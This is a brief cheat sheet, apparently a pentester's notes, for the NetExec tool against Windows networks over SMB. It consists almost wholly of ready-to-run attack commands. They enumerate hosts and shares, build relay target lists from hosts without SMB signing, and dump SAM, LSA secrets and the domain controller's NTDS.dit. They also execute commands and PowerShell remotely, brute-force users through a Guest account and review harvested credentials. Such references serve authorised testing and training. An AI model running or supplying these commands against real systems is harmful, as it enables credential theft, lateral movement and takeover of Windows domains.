NetExec
Similar Syntax to CME
Find ip/hostname/SMB Signinig/etc:
netexec smb targets.txtGenerate a list of SMB Signing disabled for relays
netexec smb targets.txt --gen-relay-list relay.txtFind hosts user can log into/is admin on
netexec smb targets.txt -u user -p 'password'Enumerate shares
netexec smb ip -u user -p 'password' --sharesDump SAM
netexec smb ip -u user -p 'password' --samDump LSA
netexec smb ip -u user -p 'password' --lsaPass cmd
netexec smb ip -u user -p 'password' -x 'command'Pass powershell
netexec smb ip -u user -p 'password' -X 'command'List users if Guest account is enabled
netexec smb (ip) -u 'Guest' -p '' --rid-bruteLook at domain admins
netexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'Look at logged on users
netexec smb ip -u user -p 'password' --loggedon-usersLook at NTDS.dit - is LOUD - USE WITH CAUTION
netexec smb dc-ip -u domain-admin-user -p 'password' --ntdsDatabase
View database
nxcdbView creds grabbed via SMB
proto smb
credsLast updated